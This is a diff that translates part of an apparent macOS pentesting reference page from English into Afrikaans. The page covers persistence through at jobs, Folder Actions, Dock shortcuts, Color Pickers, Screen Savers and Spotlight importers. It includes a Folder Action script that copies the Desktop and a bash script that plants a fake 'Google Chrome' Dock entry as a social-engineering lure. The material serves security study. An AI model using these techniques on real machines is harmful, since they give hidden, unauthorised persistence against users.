+Standaard is hulle **uitgeschakel**, maar die **root**-gebruiker kan **hulle aktiveer** met: ```bash sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist ``` - -This will create a file in 1 hour: - +Hierdie sal 'n lêer skep binne 1 uur: ```bash echo "echo 11 > /tmp/at.txt" | at now+1 ``` - -Check the job queue using `atq:` - +Kyk na die werkry met behulp van `atq:` ```shell-session sh-3.2# atq 26 Tue Apr 27 00:46:00 2021 22 Wed Apr 28 00:29:00 2021 ``` - -Above we can see two jobs scheduled. We can print the details of the job using `at -c JOBNUMBER` - +Bokant kan ons twee geskeduleerde take sien. Ons kan die besonderhede van die taak afdruk deur `at -c JOBNUMMER` te gebruik. ```shell-session sh-3.2# at -c 26 #!/bin/sh @@ -716,19 +702,17 @@ LC_CTYPE=UTF-8; export LC_CTYPE SUDO_GID=20; export SUDO_GID _=/usr/bin/at; export _ cd /Users/csaby || { - echo 'Execution directory inaccessible' >&2 - exit 1 +echo 'Execution directory inaccessible' >&2 +exit 1 } unset OLDPWD echo 11 > /tmp/at.txt ``` - {% hint style="warning" %} -If AT tasks aren't enabled the created tasks won't be executed. +As AT-take nie geaktiveer is nie, sal die geskepte take nie uitgevoer word nie. {% endhint %} -The **job files** can be found at `/private/var/at/jobs/` - +Die **werk lêers** kan gevind word by `/private/var/at/jobs/` ``` sh-3.2# ls -l /private/var/at/jobs/ total 32 
@@ -737,46 +721,44 @@ total 32 -r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2 -rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2 ``` +Die lêernaam bevat die tou, die taaknommer, en die tyd waarop dit geskeduleer is om uit te voer. Byvoorbeeld, laat ons kyk na `a0001a019bdcd2`. -The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at `a0001a019bdcd2`. +* `a` - dit is die tou +* `0001a` - taaknommer in heksadesimale, `0x1a = 26` +* `019bdcd2` - tyd in heksadesimale. Dit verteenwoordig die minute wat verloop het sedert die epog. `0x019bdcd2` is `26991826` in desimale. As ons dit met 60 vermenigvuldig, kry ons `1619509560`, wat `GMT: 2021. April 27., Dinsdag 7:46:00` is. -* `a` - this is the queue -* `0001a` - job number in hex, `0x1a = 26` -* `019bdcd2` - time in hex. It represents the minutes passed since epoch. `0x019bdcd2` is `26991826` in decimal. If we multiply it by 60 we get `1619509560`, which is `GMT: 2021. April 27., Tuesday 7:46:00`. +As ons die taaklêer druk, vind ons dat dit dieselfde inligting bevat as wat ons met `at -c` gekry het. -If we print the job file, we find that it contains the same information we got using `at -c`. 
- -### Folder Actions +### Voueraksies Writeup: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\ Writeup: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to be able to call `osascript` with arguments to contact **`System Events`** to be able to configure Folder Actions -* TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - * It has some basic TCC permissions like Desktop, Documents and Downloads +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet in staat wees om `osascript` met argumente te roep om kontak te maak met **`System Events`** om voueraksies te kan konfigureer +* TCC-omseiling: [🟠](https://emojipedia.org/large-orange-circle) +* Dit het 'n paar basiese TCC-toestemmings soos Skermblad, Dokumente en Aflaai -#### Location +#### Ligging * **`/Library/Scripts/Folder Action Scripts`** - * Root required - * **Trigger**: Access to the specified folder +* Root vereis +* **Trigger**: Toegang tot die gespesifiseerde vouer * **`~/Library/Scripts/Folder Action Scripts`** - * **Trigger**: Access to the specified folder +* **Trigger**: Toegang tot die gespesifiseerde vouer -#### Description & Exploitation +#### Beskrywing & Uitbuiting -Folder Actions are scripts automatically triggered by changes in a folder such as adding, removing items, or other actions like opening or resizing the folder window. These actions can be utilized for various tasks, and can be triggered in different ways like using the Finder UI or terminal commands. +Voueraksies is skripte wat outomaties geaktiveer word deur veranderinge in 'n vouer, soos die byvoeging of verwydering van items, of ander aksies soos die oopmaak of verander van die vouer-venster. 
Hierdie aksies kan gebruik word vir verskeie take, en kan op verskillende maniere geaktiveer word, soos deur die Finder UI of terminal-opdragte. -To set up Folder Actions, you have options like: +Om voueraksies op te stel, het jy opsies soos: -1. Crafting a Folder Action workflow with [Automator](https://support.apple.com/guide/automator/welcome/mac) and installing it as a service. -2. Attaching a script manually via the Folder Actions Setup in the context menu of a folder. -3. Utilizing OSAScript to send Apple Event messages to the `System Events.app` for programmatically setting up a Folder Action. - * This method is particularly useful for embedding the action into the system, offering a level of persistence. - -The following script is an example of what can be executed by a Folder Action: +1. Die skep van 'n voueraksie-werkvloei met [Automator](https://support.apple.com/guide/automator/welcome/mac) en dit installeer as 'n diens. +2. Die aanhegting van 'n skrip handmatig via die Voueraksies-instelling in die konteksmenu van 'n vouer. +3. Die gebruik van OSAScript om Apple Event-boodskappe na die `System Events.app` te stuur vir die programmatiese opstel van 'n voueraksie. +* Hierdie metode is veral nuttig om die aksie in die stelsel in te bed, en bied 'n vlak van volharding. +Die volgende skrip is 'n voorbeeld van wat deur 'n voueraksie uitgevoer kan word: ```applescript // source.js var app = Application.currentApplication(); 
@@ -786,15 +768,11 @@ app.doShellScript("touch ~/Desktop/folderaction.txt"); app.doShellScript("mkdir /tmp/asd123"); app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` - -To make the above script usable by Folder Actions, compile it using: - +Om die bogenoemde skripsie bruikbaar te maak vir Vouer Aksies, stel dit saam deur die volgende te gebruik: ```bash osacompile -l JavaScript -o folder.scpt source.js ``` - -After the script is compiled, set up Folder Actions by executing the script below. This script will enable Folder Actions globally and specifically attach the previously compiled script to the Desktop folder. - +Nadat die skrip saamgestel is, stel die Folder Actions op deur die volgende skrip uit te voer. Hierdie skrip sal Folder Actions wêreldwyd aktiveer en spesifiek die vorige saamgestelde skrip aan die Desktop-vouer koppel. ```javascript // Enabling and attaching Folder Action var se = Application("System Events"); @@ -804,16 +782,13 @@ var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"}); se.folderActions.push(fa); fa.scripts.push(myScript); ``` - -Run the setup script with: - +Voer die opstellingskrip uit met: ```bash osascript -l JavaScript /Users/username/attach.scpt ``` +* Hier is die manier om volharding te implementeer via die GUI: -* This is the way yo implement this persistence via GUI: - -This is the script that will be executed: +Hierdie is die skrip wat uitgevoer sal word: {% code title="source.js" %} ```applescript 
@@ -826,58 +801,56 @@ app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` {% endcode %} -Compile it with: `osacompile -l JavaScript -o folder.scpt source.js` - -Move it to: +Kompileer dit met: `osacompile -l JavaScript -o folder.scpt source.js` +Skuif dit na: ```bash mkdir -p "$HOME/Library/Scripts/Folder Action Scripts" mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts" ``` - -Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp): +Dan, open die `Folder Actions Setup`-toepassing, kies die **gids wat jy wil dophou** en kies in jou geval **`folder.scpt`** (in my geval het ek dit output2.scp genoem):
-Now, if you open that folder with **Finder**, your script will be executed. +Nou, as jy daardie gids met **Finder** oopmaak, sal jou skripsie uitgevoer word. -This configuration was stored in the **plist** located in **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** in base64 format. +Hierdie konfigurasie is gestoor in die **plist** wat in **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** in base64-formaat geleë is. -Now, lets try to prepare this persistence without GUI access: +Nou, laat ons probeer om hierdie volharding sonder GUI-toegang voor te berei: -1. **Copy `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** to `/tmp` to backup it: - * `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp` -2. **Remove** the Folder Actions you just set: +1. **Kopieer `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** na `/tmp` om dit te rugsteun: +* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp` +2. **Verwyder** die Gidsaksies wat jy net ingestel het:
-Now that we have an empty environment +Nou dat ons 'n leë omgewing het -3. Copy the backup file: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/` -4. Open the Folder Actions Setup.app to consume this config: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"` +3. Kopieer die rugsteunlêer: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/` +4. Maak die Folder Actions Setup.app oop om hierdie konfigurasie te gebruik: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"` {% hint style="danger" %} -And this didn't work for me, but those are the instructions from the writeup:( +En dit het nie vir my gewerk nie, maar dit is die instruksies van die skryfwerk:( {% endhint %} -### Dock shortcuts +### Dokkiesnelkoppeling -Writeup: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/) +Skryfwerk: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to have installed a malicious application inside the system -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet 'n skadelike toepassing binne die stelsel geïnstalleer hê +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * `~/Library/Preferences/com.apple.dock.plist` - * **Trigger**: When the user clicks on the app inside the dock +* **Trigger**: Wanneer die gebruiker op die toepassing in die dokkie klik -#### Description & Exploitation +#### Beskrywing & Uitbuiting -All the applications that appear in the Dock are specified inside the plist: **`~/Library/Preferences/com.apple.dock.plist`** +Al die toepassings wat in die Dokkie verskyn, word gespesifiseer binne die plist: 
**`~/Library/Preferences/com.apple.dock.plist`** -It's possible to **add an application** just with: +Dit is moontlik om **'n toepassing by te voeg** net met: {% code overflow="wrap" %} ```bash @@ -889,8 +862,7 @@ killall Dock ``` {% endcode %} -Using some **social engineering** you could **impersonate for example Google Chrome** inside the dock and actually execute your own script: - +Deur van **sosiale ingenieurswese** gebruik te maak, kan jy byvoorbeeld Google Chrome naboots in die dok en jou eie skripsie uitvoer: ```bash #!/bin/sh @@ -916,22 +888,22 @@ cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> - CFBundleExecutable - Google Chrome - CFBundleIdentifier - com.google.Chrome - CFBundleName - Google Chrome - CFBundleVersion - 1.0 - CFBundleShortVersionString - 1.0 - CFBundleInfoDictionaryVersion - 6.0 - CFBundlePackageType - APPL - CFBundleIconFile - app +CFBundleExecutable +Google Chrome +CFBundleIdentifier +com.google.Chrome +CFBundleName +Google Chrome +CFBundleVersion +1.0 +CFBundleShortVersionString +1.0 +CFBundleInfoDictionaryVersion +6.0 +CFBundlePackageType +APPL +CFBundleIconFile +app EOF 
@@ -943,93 +915,90 @@ cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chr defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0' killall Dock ``` - -### Color Pickers +### Kleurkiezers Writeup: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * A very specific action needs to happen - * You will end in another sandbox -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandbox te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* 'n Baie spesifieke aksie moet plaasvind +* Jy sal in 'n ander sandbox eindig +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * `/Library/ColorPickers` - * Root required - * Trigger: Use the color picker +* Root vereis +* Trigger: Gebruik die kleurkieser * `~/Library/ColorPickers` - * Trigger: Use the color picker +* Trigger: Gebruik die kleurkieser -#### Description & Exploit +#### Beskrywing & Uitbuiting -**Compile a color picker** bundle with your code (you could use [**this one for example**](https://github.com/viktorstrate/color-picker-plus)) and add a constructor (like in the [Screen Saver section](macos-auto-start-locations.md#screen-saver)) and copy the bundle to `~/Library/ColorPickers`. +**Kompileer 'n kleurkieser** bundel met jou kode (jy kan byvoorbeeld [**hierdie een**](https://github.com/viktorstrate/color-picker-plus) gebruik) en voeg 'n konstrukteur by (soos in die [Screen Saver afdeling](macos-auto-start-locations.md#screen-saver)) en kopieer die bundel na `~/Library/ColorPickers`. -Then, when the color picker is triggered your should should be aswell. +Dan, wanneer die kleurkieser geaktiveer word, moet jou kode ook geaktiveer word. 
-Note that the binary loading your library has a **very restrictive sandbox**: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64` +Let daarop dat die binêre lading van jou biblioteek 'n **baie beperkende sandbox** het: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64` {% code overflow="wrap" %} ```bash [Key] com.apple.security.temporary-exception.sbpl - [Value] - [Array] - [String] (deny file-write* (home-subpath "/Library/Colors")) - [String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers")) - [String] (allow file-read* (extension "com.apple.app-sandbox.read")) +[Value] +[Array] +[String] (deny file-write* (home-subpath "/Library/Colors")) +[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers")) +[String] (allow file-read* (extension "com.apple.app-sandbox.read")) ``` {% endcode %} -### Finder Sync Plugins +### Finder Sync-invoegtoepassings -**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\ -**Writeup**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html) +**Bespreking**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\ +**Bespreking**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html) -* Useful to bypass sandbox: **No, because you need to execute your own app** -* TCC bypass: ??? +* Nuttig om sandbox te omzeilen: **Nee, omdat jy jou eie toepassing moet uitvoer** +* TCC-omleiding: ??? 
-#### Location +#### Ligging -* A specific app +* 'n Spesifieke toepassing -#### Description & Exploit +#### Beskrywing & Uitbuiting -An application example with a Finder Sync Extension [**can be found here**](https://github.com/D00MFist/InSync). - -Applications can have `Finder Sync Extensions`. This extension will go inside an application that will be executed. Moreover, for the extension to be able to execute its code it **must be signed** with some valid Apple developer certificate, it must be **sandboxed** (although relaxed exceptions could be added) and it must be registered with something like: +'n Voorbeeld van 'n toepassing met 'n Finder Sync-uitbreiding [**kan hier gevind word**](https://github.com/D00MFist/InSync). +Toepassings kan `Finder Sync-uitbreidings` hê. Hierdie uitbreiding sal binne 'n toepassing geplaas word wat uitgevoer sal word. Verder moet die uitbreiding **onderteken** wees met 'n geldige Apple-ontwikkelaarsertifikaat, dit moet **gesandbox** wees (hoewel ontspanne uitsonderings bygevoeg kan word) en dit moet geregistreer word met iets soos: ```bash pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex pluginkit -e use -i com.example.InSync.InSync ``` - -### Screen Saver +### Skermbeveiliging Writeup: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\ Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you will end in a common application sandbox -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy sal in 'n algemene aansoek-sandboks beland +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * `/System/Library/Screen Savers` - * Root required - * **Trigger**: Select the 
screen saver +* Root vereis +* **Trigger**: Kies die skermbeveiliging * `/Library/Screen Savers` - * Root required - * **Trigger**: Select the screen saver +* Root vereis +* **Trigger**: Kies die skermbeveiliging * `~/Library/Screen Savers` - * **Trigger**: Select the screen saver +* **Trigger**: Kies die skermbeveiliging
-#### Description & Exploit +#### Beskrywing & Uitbuiting -Create a new project in Xcode and select the template to generate a new **Screen Saver**. Then, are your code to it, for example the following code to generate logs. +Skep 'n nuwe projek in Xcode en kies die sjabloon om 'n nuwe **Skermbeveiliging** te genereer. Voeg dan jou kode daaraan toe, byvoorbeeld die volgende kode om logboeke te genereer. -**Build** it, and copy the `.saver` bundle to **`~/Library/Screen Savers`**. Then, open the Screen Saver GUI and it you just click on it, it should generate a lot of logs: +**Bou** dit en kopieer die `.saver` bundel na **`~/Library/Screen Savers`**. Maak dan die Skermbeveiliging GUI oop en as jy net daarop klik, moet dit 'n hele klomp logboeke genereer: {% code overflow="wrap" %} ```bash @@ -1043,11 +1012,10 @@ Timestamp (process)[PID] {% endcode %} {% hint style="danger" %} -Note that because inside the entitlements of the binary that loads this code (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) you can find **`com.apple.security.app-sandbox`** you will be **inside the common application sandbox**. +Let daarop dat omdat binne die toekennings van die binêre lading van hierdie kode (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) jy **`com.apple.security.app-sandbox`** kan vind, sal jy **binne die algemene aansoek-sandbox** wees. {% endhint %} -Saver code: - +Saver-kode: ```objectivec // // ScreenSaverExampleView.m 
@@ -1062,198 +1030,193 @@ Saver code: - (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - self = [super initWithFrame:frame isPreview:isPreview]; - if (self) { - [self setAnimationTimeInterval:1/30.0]; - } - return self; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +self = [super initWithFrame:frame isPreview:isPreview]; +if (self) { +[self setAnimationTimeInterval:1/30.0]; +} +return self; } - (void)startAnimation { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super startAnimation]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super startAnimation]; } - (void)stopAnimation { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super stopAnimation]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super stopAnimation]; } - (void)drawRect:(NSRect)rect { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - [super drawRect:rect]; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +[super drawRect:rect]; } - (void)animateOneFrame { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return; } - (BOOL)hasConfigureSheet { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return NO; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return NO; } - (NSWindow*)configureSheet { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); - return nil; +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +return nil; } __attribute__((constructor)) void custom(int argc, const char **argv) { - NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); +NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__); } @end ``` - -### Spotlight Plugins +### Spotlight Inproppe writeup: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you will end in an 
application sandbox -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) - * The sandbox looks very limited +* Nuttige om die sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy sal in 'n aansoek-sandput beland +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) +* Die sandput lyk baie beperk -#### Location +#### Plek * `~/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. * `/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. - * Root required +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. +* Root vereis * `/System/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. - * Root required +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. +* Root vereis * `Some.app/Contents/Library/Spotlight/` - * **Trigger**: A new file with a extension managed by the spotlight plugin is created. - * New app required +* **Trigger**: 'n Nuwe lêer met 'n uitbreiding wat deur die spotlight-inprop bestuur word, word geskep. +* Nuwe aansoek vereis -#### Description & Exploitation +#### Beskrywing & Uitbuiting -Spotlight is macOS's built-in search feature, designed to provide users with **quick and comprehensive access to data on their computers**.\ -To facilitate this rapid search capability, Spotlight maintains a **proprietary database** and creates an index by **parsing most files**, enabling swift searches through both file names and their content. 
+Spotlight is macOS se ingeboude soekfunksie, ontwerp om gebruikers **vinnige en omvattende toegang tot data op hul rekenaars** te bied.\ +Om hierdie vinnige soekvermoë moontlik te maak, onderhou Spotlight 'n **eiendomsdatabasis** en skep 'n indeks deur **meeste lêers te ontled**, wat vinnige soektogte deur beide lêernaam en inhoud moontlik maak. -The underlying mechanism of Spotlight involves a central process named 'mds', which stands for **'metadata server'.** This process orchestrates the entire Spotlight service. Complementing this, there are multiple 'mdworker' daemons that perform a variety of maintenance tasks, such as indexing different file types (`ps -ef | grep mdworker`). These tasks are made possible through Spotlight importer plugins, or **".mdimporter bundles**", which enable Spotlight to understand and index content across a diverse range of file formats. +Die onderliggende meganisme van Spotlight behels 'n sentrale proses genaamd 'mds', wat staan vir **'metadata-bediener'**. Hierdie proses orkestreer die hele Spotlight-diens. Daarbenewens is daar verskeie 'mdworker'-demone wat verskillende instandhoudingstake uitvoer, soos die indeksering van verskillende lêertipes (`ps -ef | grep mdworker`). Hierdie take word moontlik gemaak deur Spotlight-invoerder-inproppe, of **".mdimporter-bundels**", wat Spotlight in staat stel om inhoud oor 'n verskeidenheid lêerformate te verstaan en te indekseer. -The plugins or **`.mdimporter`** bundles are located in the places mentioned previously and if a new bundle appear it's loaded within monute (no need to restart any service). These bundles need to indicate which **file type and extensions they can manage**, this way, Spotlight will use them when a new file with the indicated extension is created. 
- -It's possible to **find all the `mdimporters`** loaded running: +Die inproppe of **`.mdimporter`**-bundels is geleë op die vorige genoemde plekke en as 'n nuwe bundel verskyn, word dit binne minute gelaai (geen nodigheid om enige diens te herlaai nie). Hierdie bundels moet aandui watter **lêertipe en uitbreidings hulle kan bestuur**, op hierdie manier sal Spotlight hulle gebruik wanneer 'n nuwe lêer met die aangeduide uitbreiding geskep word. +Dit is moontlik om **alle die gelaai `mdimporters`** te vind deur die volgende uit te voer: ```bash mdimport -L Paths: id(501) ( - "/System/Library/Spotlight/iWork.mdimporter", - "/System/Library/Spotlight/iPhoto.mdimporter", - "/System/Library/Spotlight/PDF.mdimporter", - [...] +"/System/Library/Spotlight/iWork.mdimporter", +"/System/Library/Spotlight/iPhoto.mdimporter", +"/System/Library/Spotlight/PDF.mdimporter", +[...] ``` - -And for example **/Library/Spotlight/iBooksAuthor.mdimporter** is used to parse these type of files (extensions `.iba` and `.book` among others): - +En byvoorbeeld **/Library/Spotlight/iBooksAuthor.mdimporter** word gebruik om hierdie tipe lêers te ontled (uitbreidings `.iba` en `.book` onder andere): ```json plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist [...] "CFBundleDocumentTypes" => [ - 0 => { - "CFBundleTypeName" => "iBooks Author Book" - "CFBundleTypeRole" => "MDImporter" - "LSItemContentTypes" => [ - 0 => "com.apple.ibooksauthor.book" - 1 => "com.apple.ibooksauthor.pkgbook" - 2 => "com.apple.ibooksauthor.template" - 3 => "com.apple.ibooksauthor.pkgtemplate" - ] - "LSTypeIsPackage" => 0 - } - ] +0 => { +"CFBundleTypeName" => "iBooks Author Book" +"CFBundleTypeRole" => "MDImporter" +"LSItemContentTypes" => [ +0 => "com.apple.ibooksauthor.book" +1 => "com.apple.ibooksauthor.pkgbook" +2 => "com.apple.ibooksauthor.template" +3 => "com.apple.ibooksauthor.pkgtemplate" +] +"LSTypeIsPackage" => 0 +} +] [...] 
- => { - "UTTypeConformsTo" => [ - 0 => "public.data" - 1 => "public.composite-content" - ] - "UTTypeDescription" => "iBooks Author Book" - "UTTypeIdentifier" => "com.apple.ibooksauthor.book" - "UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor" - "UTTypeTagSpecification" => { - "public.filename-extension" => [ - 0 => "iba" - 1 => "book" - ] - } - } +=> { +"UTTypeConformsTo" => [ +0 => "public.data" +1 => "public.composite-content" +] +"UTTypeDescription" => "iBooks Author Book" +"UTTypeIdentifier" => "com.apple.ibooksauthor.book" +"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor" +"UTTypeTagSpecification" => { +"public.filename-extension" => [ +0 => "iba" +1 => "book" +] +} +} [...] ``` - {% hint style="danger" %} -If you check the Plist of other `mdimporter` you might not find the entry **`UTTypeConformsTo`**. Thats because that is a built-in _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) and it doesn't need to specify extensions. +As jy die Plist van ander `mdimporter` nagaan, sal jy dalk nie die inskrywing **`UTTypeConformsTo`** vind nie. Dit is omdat dit 'n ingeboude _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) is en dit hoef nie uitbreidings te spesifiseer nie. -Moreover, System default plugins always take precedence, so an attacker can only access files that are not otherwise indexed by Apple's own `mdimporters`. +Verder neem stelselverstellings altyd voorrang, so 'n aanvaller kan slegs toegang verkry tot lêers wat nie andersins deur Apple se eie `mdimporters` geïndekseer word nie. 
{% endhint %} -To create your own importer you could start with this project: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) and then change the name, the **`CFBundleDocumentTypes`** and add **`UTImportedTypeDeclarations`** so it supports the extension you would like to support and refelc them in **`schema.xml`**.\ -Then **change** the code of the function **`GetMetadataForFile`** to execute your payload when a file with the processed extension is created. +Om jou eie invoerder te skep, kan jy begin met hierdie projek: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) en dan die naam verander, die **`CFBundleDocumentTypes`** verander en **`UTImportedTypeDeclarations`** byvoeg sodat dit die uitbreiding ondersteun wat jy wil ondersteun en reflekteer dit in **`schema.xml`**.\ +Verander dan die kode van die funksie **`GetMetadataForFile`** om jou payload uit te voer wanneer 'n lêer met die verwerkte uitbreiding geskep word. -Finally **build and copy your new `.mdimporter`** to one of thre previous locations and you can chech whenever it's loaded **monitoring the logs** or checking **`mdimport -L.`** +Laastens **bou en kopieer jou nuwe `.mdimporter`** na een van die vorige liggings en jy kan nagaan wanneer dit gelaai word deur die **logs te monitor** of deur **`mdimport -L.`** te nagaan. -### ~~Preference Pane~~ +### ~~Voorkeurpaneel~~ {% hint style="danger" %} -It doesn't look like this is working anymore. +Dit lyk nie asof dit meer werk nie. 
{% endhint %} -Writeup: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/) +Verslag: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * It needs a specific user action -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Dit vereis 'n spesifieke gebruikersaksie +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * **`/System/Library/PreferencePanes`** * **`/Library/PreferencePanes`** * **`~/Library/PreferencePanes`** -#### Description +#### Beskrywing -It doesn't look like this is working anymore. +Dit lyk nie asof dit meer werk nie. -## Root Sandbox Bypass +## Root Sandput Omseiling {% hint style="success" %} -Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** being **root** and/or requiring other **weird conditions.** +Hier kan jy beginliggings vind wat nuttig is vir **sandput omseiling** wat jou in staat stel om eenvoudig iets uit te voer deur dit in 'n lêer te **skryf** terwyl jy **root** is en/of ander **vreemde voorwaardes** vereis. 
